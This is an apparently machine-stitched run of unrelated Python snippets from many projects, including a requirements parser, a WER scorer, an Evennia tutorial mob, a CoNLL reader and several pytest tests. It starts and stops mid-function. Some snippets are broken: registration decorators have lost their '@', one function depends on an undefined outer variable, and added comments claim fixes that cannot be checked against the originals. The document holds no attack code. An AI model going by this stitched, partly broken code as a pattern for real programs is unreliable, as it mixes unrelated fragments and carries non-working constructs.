            target_dir = local_resource_dir / resolved.parent.name
        else:
            target_dir = local_resource_dir
        if not target_dir.is_dir():
            mkdir(target_dir)
        if can_symlink(target_dir):
            _symlink_package_resource(
                target_dir,
                resource,
                force=force,
                suffix=suffix,
                executable=resource_type == 'app',
            )
        else:
            _copy_package_resource(target_dir, resource, suffix=suffix)
def retrieve_artifact(name: str, gpu: Optional[str]):
    """Read every file of a (possibly GPU-flavored) artifact directory.

    Returns a dict mapping file name (without extension) to file contents;
    empty when the directory does not exist.

    Raises:
        ValueError: for an unknown *gpu* flavor or an unreadable (binary) file.
    """
    if gpu not in [None, 'single', 'multi']:
        raise ValueError(f'Invalid GPU for artifact. Passed GPU: `{gpu}`.')
    if gpu is not None:
        name = f'{gpu}-gpu-docker_{name}'

    artifact = {}
    if os.path.exists(name):
        for file in os.listdir(name):
            try:
                with open(os.path.join(name, file)) as f:
                    artifact[file.split('.')[0]] = f.read()
            except UnicodeDecodeError as e:
                raise ValueError(f'Could not open {os.path.join(name, file)}.') from e
    return artifact
class Text(WorldObject):
    """World object whose uniforms carry a rotation+scale (no translation) matrix."""

    # extend the base uniform layout with a 4x4 float32 matrix slot
    uniform_type = dict(WorldObject.uniform_type, rot_scale_transform='4x4xf4')

    def __init__(self, geometry=None, material=None, *, visible=True, render_order=0, render_mask='auto'):
        super().__init__(geometry, material, visible=visible, render_order=render_order, render_mask=render_mask)
        # re-run the (parent's) uniform upload whenever the world transform changes
        self.world.on_update(super()._update_uniform_buffers)

    def _update_uniform_buffers(self, transform: AffineBase):
        # compose rotation and scale only; translation is deliberately zeroed
        matrix = la.mat_compose((0, 0, 0), self.local.rotation, self.local.scale)
        # transposed before upload -- presumably for the GPU's expected matrix
        # memory order; TODO confirm against the shader side
        self.uniform_buffer.data['rot_scale_transform'] = matrix.T
class VNet(nn.Module):
    """Shared feature extractor followed by a task-specific classifier head."""

    def __init__(self, input, hidden1, hidden2, output, num_classes):
        super(VNet, self).__init__()
        self.feature = share(input, hidden1, hidden2)
        # NB: attribute name `classfier` (sic) kept -- it is part of the
        # class's public surface.
        self.classfier = task(hidden2, output, num_classes)

    def forward(self, x, num, c):
        features = self.feature(x)
        return self.classfier(features, num, c)
def result_k_nearest_different2():
    """Expected-result fixture: k-nearest intervals with signed distances
    (negative = upstream overlap direction), parsed into a DataFrame."""
    c = 'Chromosome Start End Start_b End_b Distance\n0 chr1 11 16 15 20 0\n1 chr1 11 20 15 20 0\n2 chr1 11 20 1 10 -2\n3 chr1 20 21 15 20 1\n4 chr1 20 21 1 10 -11\n5 chr1 20 21 200 2000 180\n6 chr1 20 22 15 20 1\n7 chr1 20 22 1 10 -11\n8 chr1 20 22 200 2000 179\n9 chr1 50 100 15 20 -31\n10 chr1 50 100 1 10 -41'
    df = string_to_df(c)
    return df
def parse_requirements(fname='requirements.txt', with_version=True):
    """Parse a pip requirements file into a list of requirement spec strings.

    Args:
        fname: path to the requirements file.
        with_version: keep version specifiers (and env markers) when True.

    Returns:
        list[str]: package specs, e.g. ``['numpy>=1.0;platform_system=="..."']``.
    """
    import re
    import sys
    from os.path import exists
    require_fpath = fname

    def parse_line(line):
        # Yield info dicts parsed from one requirement line.
        if line.startswith('-r '):
            # recursively include another requirements file
            target = line.split(' ')[1]
            for info in parse_require_file(target):
                (yield info)
        else:
            info = {'line': line}
            if line.startswith('-e '):
                # editable install: name comes from the #egg= fragment
                info['package'] = line.split('#egg=')[1]
            elif ('+' in line):
                # VCS requirement (e.g. git+https://...): keep verbatim
                info['package'] = line
            else:
                # split "name<op>version" on the first comparison operator
                pat = (('(' + '|'.join(['>=', '==', '>'])) + ')')
                parts = re.split(pat, line, maxsplit=1)
                parts = [p.strip() for p in parts]
                info['package'] = parts[0]
                if (len(parts) > 1):
                    (op, rest) = parts[1:]
                    if (';' in rest):
                        # e.g. numpy>=1.0;python_version<'3'
                        (version, platform_deps) = map(str.strip, rest.split(';'))
                        info['platform_deps'] = platform_deps
                    else:
                        version = rest
                    info['version'] = (op, version)
            (yield info)

    def parse_require_file(fpath):
        # Yield parsed info for every non-blank, non-comment line of fpath.
        with open(fpath, 'r') as f:
            for line in f.readlines():
                line = line.strip()
                if (line and (not line.startswith('#'))):
                    for info in parse_line(line):
                        (yield info)

    def gen_packages_items():
        # Render parsed info dicts back into pip-style spec strings.
        if exists(require_fpath):
            for info in parse_require_file(require_fpath):
                parts = [info['package']]
                if (with_version and ('version' in info)):
                    parts.extend(info['version'])
                if (not sys.version.startswith('3.4')):
                    # environment markers are not supported on Python 3.4
                    platform_deps = info.get('platform_deps')
                    if (platform_deps is not None):
                        parts.append((';' + platform_deps))
                item = ''.join(parts)
                (yield item)

    packages = list(gen_packages_items())
    return packages
def remove_messed_up_sentences(raw_data, direction, mess_up_train, mess_up_train_pairs, corrected_langs):
    """Filter a train bitext, dropping pairs whose side or (either-order) pair
    appears in the blacklists; write survivors and record the direction.

    Returns (total_lines, kept_lines), or None when the split files are missing.

    NOTE(review): `to_folder` is read from enclosing/global scope, not passed
    as a parameter -- confirm it is defined wherever this is called.
    """
    split = 'train'
    (src_lang, tgt_lang) = direction.split('-')
    tgt = f'{raw_data}/{split}.{direction}.{tgt_lang}'
    src = f'{raw_data}/{split}.{direction}.{src_lang}'
    print(f'working on {direction}: ', src, tgt)
    if ((not os.path.exists(tgt)) or (not os.path.exists(src))):
        return
    corrected_tgt = f'{to_folder}/{split}.{direction}.{tgt_lang}'
    corrected_src = f'{to_folder}/{split}.{direction}.{src_lang}'
    line_num = 0
    keep_num = 0
    with open(src, encoding='utf8') as fsrc, open(tgt, encoding='utf8') as ftgt, open(corrected_src, 'w', encoding='utf8') as fsrc_corrected, open(corrected_tgt, 'w', encoding='utf8') as ftgt_corrected:
        for (s, t) in zip(fsrc, ftgt):
            s = s.strip()
            t = t.strip()
            # keep only if neither side nor the pair (in either order) is blacklisted
            if ((t not in mess_up_train) and (s not in mess_up_train) and ((s, t) not in mess_up_train_pairs) and ((t, s) not in mess_up_train_pairs)):
                corrected_langs.add(direction)  # re-added for every kept line (idempotent set add)
                print(s, file=fsrc_corrected)
                print(t, file=ftgt_corrected)
                keep_num += 1
            line_num += 1
            if ((line_num % 1000) == 0):
                print(f'completed {line_num} lines', end='\r')
    return (line_num, keep_num)
def ensemble_score(our_score, pacsum_score, lam1):
    """Blend two per-sentence score lists: ``lam1 * ours + (1 - lam1) * pacsum``.

    Both lists are clipped at zero and L1-normalized first (a list summing to
    zero is left as-is); pacsum_score is truncated to len(our_score).
    """

    def normalize(scores):
        clipped = [max(0, value) for value in lmap(float, scores)]
        total = sum(clipped)
        if total == 0:
            return clipped
        return [value / total for value in clipped]

    pacsum = normalize(pacsum_score[:len(our_score)])
    ours = normalize(our_score)
    return [lam1 * a + (1 - lam1) * b for a, b in zip(ours, pacsum)]
_scorer('wer', dataclass=WerScorerConfig)
# NOTE(review): the call above looks like a registration decorator that lost
# its leading '@' -- as written, its result is discarded. Verify against the
# original module before relying on scorer registration.
class WerScorer(BaseScorer):
    """Word-error-rate scorer: accumulated edit distance over tokenized words."""

    def __init__(self, cfg):
        super().__init__(cfg)
        self.reset()
        try:
            import editdistance as ed
        except ImportError:
            raise ImportError('Please install editdistance to use WER scorer')
        self.ed = ed
        self.tokenizer = EvaluationTokenizer(tokenizer_type=self.cfg.wer_tokenizer, lowercase=self.cfg.wer_lowercase, punctuation_removal=self.cfg.wer_remove_punct, character_tokenization=self.cfg.wer_char_level)

    def reset(self):
        # running totals across all scored sentence pairs
        self.distance = 0
        self.ref_length = 0

    def add_string(self, ref, pred):
        """Accumulate edit distance and reference length for one pair."""
        ref_items = self.tokenizer.tokenize(ref).split()
        pred_items = self.tokenizer.tokenize(pred).split()
        self.distance += self.ed.eval(ref_items, pred_items)
        self.ref_length += len(ref_items)

    def result_string(self):
        return f'WER: {self.score():.2f}'

    def score(self):
        # WER as a percentage; 0 when no reference tokens have been seen
        return (((100.0 * self.distance) / self.ref_length) if (self.ref_length > 0) else 0)
def test_py_save_key_error():
    """save() with an unquoted name must raise a helpful KeyError."""
    context = Context({'py': "notfound='arb'; save(notfound)"})

    with pytest.raises(KeyError) as err:
        pypyr.steps.py.run_step(context)

    expected = repr(
        "Trying to save 'arb', but can't find it in the py step scope. "
        "Remember it should be save('key'), not save(key) - mind the quotes."
    )
    assert str(err.value) == expected
def _conduct_repo_search(username, query, limit=25, page=1):
    """Run a filtered repository search and package the page for the UI."""
    page = min(page, 5)  # hard cap to keep the search query cheap
    offset = (page - 1) * limit

    if query:
        # fetch one extra row so we can tell whether another page exists
        matching_repos = model.repository.get_filtered_matching_repositories(
            query, filter_username=username, offset=offset, limit=limit + 1
        )
    else:
        matching_repos = []

    results = [
        {
            'name': repo.namespace_user.username + '/' + repo.name,
            'description': repo.description,
            'is_public': model.repository.is_repository_public(repo),
            'href': '/repository/' + repo.namespace_user.username + '/' + repo.name,
        }
        for repo in matching_repos[0:limit]
    ]

    return {
        'query': query,
        'num_results': len(results),
        'num_pages': page + 1 if len(matching_repos) > limit else page,
        'page': page,
        'page_size': limit,
        'results': results,
    }
class Mob(tut_objects.TutorialObject):
    """A simple state-machine mob: it patrols, hunts, attacks, dies and
    respawns, driven by TICKER_HANDLER callbacks.

    Volatile state lives on ``ndb`` (is_patrolling / is_hunting /
    is_attacking / is_immortal); persistent configuration on ``db``.
    """

    def at_init(self):
        """Rebuild volatile (ndb) state after a cache flush/server reload."""
        self.ndb.is_patrolling = (self.db.patrolling and (not self.db.is_dead))
        self.ndb.is_attacking = False
        self.ndb.is_hunting = False
        self.ndb.is_immortal = (self.db.immortal or self.db.is_dead)

    def at_object_creation(self):
        """Set up command set and all persistent configuration defaults."""
        self.cmdset.add(MobCmdSet, permanent=True)
        # main mode switches
        self.db.patrolling = True
        self.db.aggressive = True
        self.db.immortal = False
        # NOTE(review): created dead, and `db.hunting` (read by start_hunting)
        # is never initialized here, so hunting mode can never engage unless
        # it is set externally -- confirm both against the intended design.
        self.db.is_dead = True
        self.db.damage_resistance = 100.0
        # ticker paces (seconds) for each mode
        self.db.patrolling_pace = 6
        self.db.aggressive_pace = 2
        self.db.hunting_pace = 1
        self.db.death_pace = 100  # respawn delay
        self.db.last_ticker_interval = None
        # descriptions and combat messages
        self.db.desc_alive = 'This is a moving object.'
        self.db.desc_dead = 'A dead body.'
        self.db.full_health = 20
        self.db.health = 20
        self.db.send_defeated_to = 'dark cell'
        self.db.defeat_msg = 'You fall to the ground.'
        self.db.defeat_msg_room = '%s falls to the ground.'
        self.db.weapon_ineffective_msg = 'Your weapon just passes through your enemy, causing almost no effect!'
        self.db.death_msg = ('After the last hit %s evaporates.' % self.key)
        self.db.hit_msg = ('%s wails, shudders and writhes.' % self.key)
        self.db.irregular_msgs = ['the enemy looks about.', 'the enemy changes stance.']
        self.db.tutorial_info = 'This is an object with simple state AI, using a ticker to move.'

    def _set_ticker(self, interval, hook_key, stop=False):
        """(Re)subscribe this mob's single ticker to `hook_key` at `interval`.

        With stop=True only the previous subscription is removed.
        """
        idstring = 'tutorial_mob'  # ensure we never touch other tickers
        last_interval = self.db.last_ticker_interval
        last_hook_key = self.db.last_hook_key
        if (last_interval and last_hook_key):
            # unsubscribe from the previous mode's ticker first
            TICKER_HANDLER.remove(interval=last_interval, callback=getattr(self, last_hook_key), idstring=idstring)
        self.db.last_ticker_interval = interval
        self.db.last_hook_key = hook_key
        if (not stop):
            TICKER_HANDLER.add(interval=interval, callback=getattr(self, hook_key), idstring=idstring)

    def _find_target(self, location):
        """Return the first attackable player character in `location`, or None."""
        targets = [obj for obj in location.contents_get(exclude=self) if (obj.has_account and (not obj.is_superuser))]
        return (targets[0] if targets else None)

    def set_alive(self, *args, **kwargs):
        """Revive the mob: restore health/desc and resume patrolling."""
        self.db.health = self.db.full_health
        self.db.is_dead = False
        self.db.desc = self.db.desc_alive
        self.ndb.is_immortal = self.db.immortal
        self.ndb.is_patrolling = self.db.patrolling
        if (not self.location):
            self.move_to(self.home)
        if self.db.patrolling:
            self.start_patrolling()

    def set_dead(self):
        """Kill the mob: remove it from the grid and schedule respawn."""
        self.db.is_dead = True
        self.location = None
        self.ndb.is_patrolling = False
        self.ndb.is_attacking = False
        self.ndb.is_hunting = False
        self.ndb.is_immortal = True
        # respawn after death_pace seconds
        self._set_ticker(self.db.death_pace, 'set_alive')

    def start_idle(self):
        """Stop all ticker-driven behavior."""
        self._set_ticker(None, None, stop=True)

    def start_patrolling(self):
        """Enter patrol mode (falls back to idle if patrolling is disabled)."""
        if (not self.db.patrolling):
            self.start_idle()
            return
        self._set_ticker(self.db.patrolling_pace, 'do_patrol')
        self.ndb.is_patrolling = True
        self.ndb.is_hunting = False
        self.ndb.is_attacking = False
        # patrolling heals the mob back to full
        self.db.health = self.db.full_health

    def start_hunting(self):
        """Enter hunting mode (falls back to patrolling if hunting is disabled)."""
        if (not self.db.hunting):
            self.start_patrolling()
            return
        # FIX: the hook key was 'do_hunt', but the method is named
        # `do_hunting` -- getattr(self, 'do_hunt') raised AttributeError.
        self._set_ticker(self.db.hunting_pace, 'do_hunting')
        self.ndb.is_patrolling = False
        self.ndb.is_hunting = True
        self.ndb.is_attacking = False

    def start_attacking(self):
        """Enter attack mode (falls back to hunting if aggression is disabled)."""
        if (not self.db.aggressive):
            self.start_hunting()
            return
        self._set_ticker(self.db.aggressive_pace, 'do_attack')
        self.ndb.is_patrolling = False
        self.ndb.is_hunting = False
        self.ndb.is_attacking = True

    def do_patrol(self, *args, **kwargs):
        """Ticker hook: wander through random exits; attack targets on sight."""
        if ((random.random() < 0.01) and self.db.irregular_msgs):
            # occasional ambience message
            self.location.msg_contents(random.choice(self.db.irregular_msgs))
        if self.db.aggressive:
            target = self._find_target(self.location)
            if target:
                self.start_attacking()
                return
        exits = [exi for exi in self.location.exits if exi.access(self, 'traverse')]
        if exits:
            chosen_exit = random.choice(exits)
            self.move_to(chosen_exit.destination)
        else:
            # dead end: return home
            self.move_to(self.home)

    def do_hunting(self, *args, **kwargs):
        """Ticker hook: chase targets into adjacent rooms, else go back to patrol."""
        if ((random.random() < 0.01) and self.db.irregular_msgs):
            self.location.msg_contents(random.choice(self.db.irregular_msgs))
        if self.db.aggressive:
            target = self._find_target(self.location)
            if target:
                self.start_attacking()
                return
        exits = [exi for exi in self.location.exits if exi.access(self, 'traverse')]
        if exits:
            # peek into each neighboring room for a target
            for exi in exits:
                target = self._find_target(exi.destination)
                if target:
                    self.move_to(exi.destination)
                    return
            # quarry lost
            self.start_patrolling()
        else:
            self.move_to(self.home)

    def do_attack(self, *args, **kwargs):
        """Ticker hook: attack the target in the room; hunt if it left."""
        if ((random.random() < 0.01) and self.db.irregular_msgs):
            self.location.msg_contents(random.choice(self.db.irregular_msgs))
        target = self._find_target(self.location)
        if (not target):
            self.start_hunting()
            return
        attack_cmd = random.choice(('thrust', 'pierce', 'stab', 'slash', 'chop'))
        self.execute_cmd(('%s %s' % (attack_cmd, target)))
        if (target.db.health <= 0):
            # target defeated: teleport it away instead of killing it
            target.msg(self.db.defeat_msg)
            self.location.msg_contents((self.db.defeat_msg_room % target.key), exclude=target)
            send_defeated_to = search_object(self.db.send_defeated_to)
            if send_defeated_to:
                target.move_to(send_defeated_to[0], quiet=True)
            else:
                logger.log_err(('Mob: mob.db.send_defeated_to not found: %s' % self.db.send_defeated_to))

    def at_hit(self, weapon, attacker, damage):
        """React to being hit: non-magic weapons are heavily resisted.

        NOTE(review): non-magic hits still subtract the (resistance-divided)
        damage, matching the "almost no effect" message -- confirm intended.
        """
        if (self.db.health is None):
            # health unset: treat as unhittable
            attacker.msg(self.db.weapon_ineffective_msg)
            return
        if (not self.ndb.is_immortal):
            if (not weapon.db.magic):
                # mundane weapon: damage divided by resistance (default 100x)
                damage /= self.db.damage_resistance
                attacker.msg(self.db.weapon_ineffective_msg)
            else:
                self.location.msg_contents(self.db.hit_msg)
            self.db.health -= damage
            if (self.db.health <= 0):
                attacker.msg(self.db.death_msg)
                self.set_dead()
            elif (self.db.aggressive and (not self.ndb.is_attacking)):
                # still alive: retaliate
                self.start_attacking()

    def at_new_arrival(self, new_character):
        """Aggressive mobs engage characters entering the room."""
        if (self.db.aggressive and (not self.ndb.is_attacking)):
            self.start_attacking()
_combinator('or')
# NOTE(review): the call above looks like a decorator that lost its leading
# '@' during extraction -- as written it is a bare call whose result is
# discarded. Verify against the original module.
class OrFilter(BaseFilter):
    """Combines the two topmost filters on the parse stack with logical OR."""

    def __init__(self, stack):
        # pop the two operand filters and push the combined filter in their place
        self.subfilters = [stack[(- 2)], stack[(- 1)]]
        stack.pop()
        stack.pop()
        stack.append(self)

    def __call__(self, fobj):
        # De Morgan: a OR b == not (not a AND not b); accept_file presumably
        # AND-combines the filters it is given -- TODO confirm its semantics.
        # `f=filt` binds the loop variable eagerly, avoiding the classic
        # late-binding closure bug.
        return (not accept_file(fobj, ((lambda x, f=filt: (not f(x))) for filt in self.subfilters)))

    def __str__(self):
        return '<Filter: {comp}>'.format(comp=' or '.join(map(str, self.subfilters)))

    def decompose(self):
        # expose the operand filters (e.g. for introspection/optimization)
        return self.subfilters
class TomlVersionDeclaration(VersionDeclarationABC):
    """Version declaration stored at a dotted key (``search_text``) in a TOML file."""

    def _load(self) -> Dotty:
        """Parse the file content into a dotted-key-addressable mapping."""
        loaded = tomlkit.loads(self.content)
        return Dotty(loaded)

    def parse(self) -> set[Version]:
        """Return the version found at ``search_text``, or an empty set."""
        content = self._load()
        # None when the key is absent
        maybe_version: (str | None) = content.get(self.search_text)
        if (maybe_version is not None):
            log.debug('Found a key %r that looks like a version (%r)', self.search_text, maybe_version)
            valid_version = Version.parse(maybe_version)
            return ({valid_version} if valid_version else set())
        return set()

    def replace(self, new_version: Version) -> str:
        """Return the TOML content with ``search_text`` updated to *new_version*.

        Content is returned unchanged (re-serialized) when the key is absent.
        """
        content = self._load()
        if (self.search_text in content):
            log.info('found %r in source file contents, replacing with %s', self.search_text, new_version)
            content[self.search_text] = str(new_version)
        return tomlkit.dumps(cast(Dict[(str, Any)], content))
def test_i18n_override(bot):
    """override_i18n must take precedence over the catalog translation."""
    source = 'Use /help to get a list of all the commands.'
    default_message = botogram.utils.get_language('en').gettext(source)
    override_message = 'git gud'

    bot.override_i18n = {default_message: override_message}
    assert bot._(source) == override_message

    # clearing the overrides restores the catalog translation
    bot.override_i18n = {}
    assert bot._(source) == default_message
def test_poetry_with_non_default_multiple_secondary_sources_legacy(fixture_dir: FixtureDirGetter, with_simple_keyring: None) -> None:
    """PyPI stays the default source; both legacy sources get registered."""
    poetry = Factory().create_poetry(fixture_dir('with_non_default_multiple_secondary_sources_legacy'))
    pool = poetry.pool

    assert pool.has_repository('PyPI')
    assert isinstance(pool.repository('PyPI'), PyPiRepository)
    assert pool.get_priority('PyPI') is Priority.DEFAULT

    for source_name in ('foo', 'bar'):
        assert pool.has_repository(source_name)
        assert isinstance(pool.repository(source_name), LegacyRepository)

    assert {repo.name for repo in pool.repositories} == {'PyPI', 'foo', 'bar'}
class Reader():
    """Corpus reader producing ``Instance`` objects from CoNLL-X style
    dependency files and CoNLL-2003 style text files.

    Tracks the vocabulary of all words seen and can optionally map every
    digit to ``0`` (a common normalization for NER embeddings).
    """

    def __init__(self, digit2zero: bool=True):
        # When True, every digit in a token is replaced with '0'.
        self.digit2zero = digit2zero
        self.vocab = set()

    def read_conll(self, file: str, number: int=(- 1), is_train: bool=True) -> List[Instance]:
        """Read up to ``number`` sentences from a CoNLL-X style file.

        Columns used per token line: 1=word, 3=POS, 6=head, 7=dep label,
        10=entity label. ``number=-1`` reads the whole file. Raises
        ``ValueError`` if a sentence declares more than one root (head 0).
        """
        print(('Reading file: ' + file))
        insts = []
        num_entity = 0
        find_root = False
        with open(file, 'r', encoding='utf-8') as f:
            words = []
            heads = []
            deps = []
            labels = []
            tags = []
            for line in tqdm(f.readlines()):
                line = line.rstrip()
                if (line == ''):
                    # Blank line terminates the current sentence.
                    insts.append(Instance(Sentence(words, heads, deps, tags), labels))
                    words = []
                    heads = []
                    deps = []
                    labels = []
                    tags = []
                    find_root = False
                    if (len(insts) == number):
                        break
                    continue
                vals = line.split()
                word = vals[1]
                head = int(vals[6])
                dep_label = vals[7]
                pos = vals[3]
                label = vals[10]
                if self.digit2zero:
                    word = re.sub('\\d', '0', word)
                words.append(word)
                if (head == 0):
                    # BUGFIX: the original raised the undefined name `err`
                    # and never set `find_root`, so duplicate roots were
                    # silently accepted (and a real duplicate would have
                    # produced a NameError instead of the intended error).
                    if find_root:
                        raise ValueError('already have a root')
                    find_root = True
                heads.append((head - 1))
                deps.append(dep_label)
                tags.append(pos)
                self.vocab.add(word)
                labels.append(label)
                if label.startswith('B-'):
                    num_entity += 1
        print('number of sentences: {}, number of entities: {}'.format(len(insts), num_entity))
        return insts

    def read_txt(self, file: str, number: int=(- 1), is_train: bool=True) -> List[Instance]:
        """Read up to ``number`` sentences from a plain NER file.

        CoNLL-2003 files have ``word pos label`` columns; other files use
        the CoNLL-X column layout (1=word, 3=POS, 10=label).
        """
        print(('Reading file: ' + file))
        insts = []
        with open(file, 'r', encoding='utf-8') as f:
            words = []
            labels = []
            tags = []
            for line in tqdm(f.readlines()):
                line = line.rstrip()
                if (line == ''):
                    # Sentences have no dependency info here (heads/deps None).
                    insts.append(Instance(Sentence(words, None, None, tags), labels))
                    words = []
                    labels = []
                    tags = []
                    if (len(insts) == number):
                        break
                    continue
                if ('conll2003' in file):
                    (word, pos, label) = line.split()
                else:
                    vals = line.split()
                    word = vals[1]
                    pos = vals[3]
                    label = vals[10]
                if self.digit2zero:
                    word = re.sub('\\d', '0', word)
                words.append(word)
                tags.append(pos)
                self.vocab.add(word)
                labels.append(label)
        print('number of sentences: {}'.format(len(insts)))
        return insts

    def load_elmo_vec(self, file, insts):
        """Attach pre-computed contextual vectors (pickled list, aligned with
        ``insts``) to each instance and return the vector dimensionality."""
        # BUGFIX/robustness: use a context manager so the file is closed
        # even if unpickling fails.
        with open(file, 'rb') as f:
            all_vecs = pickle.load(f)
        size = 0
        if ('bert' in file):
            # BERT vectors carry an extra leading batch axis -- drop it.
            for (vec, inst) in zip(all_vecs, insts):
                vec = np.squeeze(vec, axis=0)
                inst.elmo_vec = vec
                size = vec.shape[1]
                assert (vec.shape[0] == len(inst.input.words))
        else:
            for (vec, inst) in zip(all_vecs, insts):
                inst.elmo_vec = vec
                size = vec.shape[1]
                assert (vec.shape[0] == len(inst.input.words))
        return size
def transposed_conv_model_without_bn():
    """Export ``TransposedConvModelWithoutBN`` to ONNX (opset 12) and reload
    it wrapped in :class:`ONNXModel`.

    Side effect: writes ``./model_transposed_conv_without_bn.onnx`` into the
    current working directory.
    """
    # Dummy input fixing the exported graph's input shape.
    x = torch.randn(10, 10, 4, 4, requires_grad=True)
    model = TransposedConvModelWithoutBN()
    torch.onnx.export(model, x, './model_transposed_conv_without_bn.onnx', export_params=True, opset_version=12, do_constant_folding=True, input_names=['input'], output_names=['output'])
    model = ONNXModel(load_model('./model_transposed_conv_without_bn.onnx'))
    return model
class FCAttention(nn.Module):
    """Channel attention: global average pool, a fixed 1000-unit
    fully-connected bottleneck, then a 1x1 conv back to ``in_channels``;
    the result scales the input feature map channel-wise."""

    def __init__(self, in_channels, norm_layer=nn.BatchNorm2d):
        super(FCAttention, self).__init__()
        self.avgpool = nn.AdaptiveAvgPool2d(1)
        self.fc = nn.Linear(in_channels, 1000)
        self.conv = nn.Sequential(
            nn.Conv2d(1000, in_channels, 1, bias=False),
            norm_layer(in_channels),
            nn.ReLU(True),
        )

    def forward(self, x):
        batch, channels = x.size(0), x.size(1)
        # Squeeze: per-channel global descriptor.
        descriptor = self.avgpool(x).view(batch, channels)
        # Excite: FC bottleneck, reshaped to a 1x1 spatial map.
        descriptor = self.fc(descriptor).view(batch, 1000, 1, 1)
        attention = self.conv(descriptor)
        # Broadcast-scale the input feature map.
        return x * attention.expand_as(x)
class MessageFilter(BaseFilter):
    """Base class for filters that inspect ``update.effective_message``.

    Subclasses implement :meth:`filter`; :meth:`check_update` narrows the
    update down to its message before delegating.
    """
    __slots__ = ()

    def check_update(self, update: Update) -> Optional[Union[(bool, FilterDataDict)]]:
        # Let the parent decide whether this kind of update is handled at
        # all before looking at the message itself.
        if super().check_update(update):
            return self.filter(update.effective_message)
        return False

    def filter(self, message: Message) -> Optional[Union[(bool, FilterDataDict)]]:
        """Decide whether ``message`` passes this filter; must be overridden
        by subclasses."""
@pytest.mark.parametrize('distribution, lower, upper, init_guess, fixed_params, mass_below_lower', [(pm.Gamma, 0.1, 0.4, {'alpha': 1, 'beta': 10}, {}, None), (pm.Normal, 155, 180, {'mu': 170, 'sigma': 3}, {}, None), (pm.StudentT, 0.1, 0.4, {'mu': 10, 'sigma': 3}, {'nu': 7}, None), (pm.StudentT, 0, 1, {'mu': 5, 'sigma': 2, 'nu': 7}, {}, None), (pm.Exponential, 0, 1, {'lam': 1}, {}, 0), (pm.HalfNormal, 0, 1, {'sigma': 1}, {}, 0), (pm.Binomial, 0, 8, {'p': 0.5}, {'n': 10}, None), (pm.Poisson, 1, 15, {'mu': 10}, {}, None), (pm.Poisson, 19, 41, {'mu': 30}, {}, None)])
@pytest.mark.parametrize('mass', [0.5, 0.75, 0.95])
def test_find_constrained_prior(distribution, lower, upper, init_guess, fixed_params, mass, mass_below_lower):
    """``find_constrained_prior`` returns parameters putting ``mass``
    probability inside ``[lower, upper]``, to within 1e-5, across a mix of
    continuous and discrete distributions."""
    opt_params = pm.find_constrained_prior(distribution, lower=lower, upper=upper, mass=mass, init_guess=init_guess, fixed_params=fixed_params, mass_below_lower=mass_below_lower)
    opt_distribution = distribution.dist(**opt_params)
    # Probability mass inside the interval = CDF(upper) - CDF(lower).
    mass_in_interval = (pm.math.exp(pm.logcdf(opt_distribution, upper)) - pm.math.exp(pm.logcdf(opt_distribution, lower))).eval()
    assert (np.abs((mass_in_interval - mass)) <= 1e-05)
@patch('pypyr.steps.filewrite.Path')
def test_filewrite_append(mock_path):
    """fileWrite with ``append: True`` creates parent dirs, opens the target
    in mode 'a' (default encoding), and writes the payload verbatim."""
    context = Context({'k1': 'v1', 'fileWrite': {'path': '/arb/blah', 'payload': 'one\ntwo\nthree', 'append': True}})
    with io.StringIO() as out_text:
        with patch('pypyr.steps.filewrite.open', mock_open()) as mock_output:
            # Capture everything written through the mocked file handle.
            mock_output.return_value.write.side_effect = out_text.write
            filewrite.run_step(context)
        payload = out_text.getvalue()
    mock_path.assert_called_once_with('/arb/blah')
    mocked_path = mock_path.return_value
    mocked_path.parent.mkdir.assert_called_once_with(parents=True, exist_ok=True)
    # 'a' == append mode; encoding stays at the default None.
    mock_output.assert_called_once_with(mocked_path, 'a', encoding=None)
    assert (payload == 'one\ntwo\nthree')
def part_inst2inst_mask(gt_part):
    """Flatten layered part-instance maps into one segmentation map and
    return per-id binary masks.

    Later layers overwrite earlier ones wherever they are non-zero.  The ids
    come from ``gt_part.unique()`` (so the background id 0 is included).
    Returns ``(ids.long(), masks.float())`` with ``masks[k] == (seg == ids[k])``.
    """
    seg = torch.zeros_like(gt_part[0])
    # Overlay each layer: non-zero pixels win over whatever is below.
    for layer in gt_part:
        seg = torch.where(layer != 0, layer, seg)
    ids = gt_part.unique()
    labels = torch.stack([inst_id for inst_id in ids])
    masks = torch.stack([seg == inst_id for inst_id in ids])
    return (labels.long(), masks.float())
class BeginPairResponse(object):
    """Response payload of a begin-pair request.

    Attributes:
        ch_type: channel/pairing type identifier.
        token: pairing token issued by the peer.
    """

    def __init__(self, ch_type: str, token: str) -> None:
        self.ch_type: str = ch_type
        self.token: str = token

    def __repr__(self) -> str:
        return f'{type(self).__name__}({self.__dict__})'

    def __eq__(self, other) -> bool:
        # BUGFIX: comparing against an unrelated type used to raise
        # AttributeError (e.g. ``resp == 5``: int has no __dict__).
        # Returning NotImplemented lets Python fall back to its default
        # handling, so such comparisons are simply False.
        if (self is other):
            return True
        if not isinstance(other, BeginPairResponse):
            return NotImplemented
        return (self.__dict__ == other.__dict__)
@pytest.mark.parametrize('superrep_conversion', [(lambda x: x), to_super, to_choi, to_chi, to_kraus])
def test_process_fidelity_of_identity(superrep_conversion):
    """Process fidelity of the identity channel is exactly 1 and real,
    regardless of the superoperator representation used."""
    num_qubits = 3
    # Identity operator on three qubits (2x2x2 tensor structure).
    oper = qeye((num_qubits * [2]))
    f = process_fidelity(superrep_conversion(oper))
    assert np.isrealobj(f)
    assert (f == pytest.approx(1))
class PropagatePositions():
    """Tree-builder wrapper that copies source-position metadata from a
    node's children onto the freshly built node.

    ``node_filter``, when given, excludes children from consideration
    (e.g. filtered-out tokens).
    """

    def __init__(self, node_builder, node_filter=None):
        self.node_builder = node_builder
        self.node_filter = node_filter

    def __call__(self, children):
        res = self.node_builder(children)
        if isinstance(res, Tree):
            res_meta = res.meta
            # First child with usable meta supplies the start position.
            first_meta = self._pp_get_meta(children)
            if (first_meta is not None):
                if (not hasattr(res_meta, 'line')):
                    # Only fill in positions the builder did not already set.
                    # Prefer container_* attributes so positions span the
                    # whole (possibly filtered) source region.
                    res_meta.line = getattr(first_meta, 'container_line', first_meta.line)
                    res_meta.column = getattr(first_meta, 'container_column', first_meta.column)
                    res_meta.start_pos = getattr(first_meta, 'container_start_pos', first_meta.start_pos)
                    res_meta.empty = False
                # container_* always reflect the full span, even when the
                # visible positions were preset.
                res_meta.container_line = getattr(first_meta, 'container_line', first_meta.line)
                res_meta.container_column = getattr(first_meta, 'container_column', first_meta.column)
                res_meta.container_start_pos = getattr(first_meta, 'container_start_pos', first_meta.start_pos)
            # Last child with usable meta supplies the end position.
            last_meta = self._pp_get_meta(reversed(children))
            if (last_meta is not None):
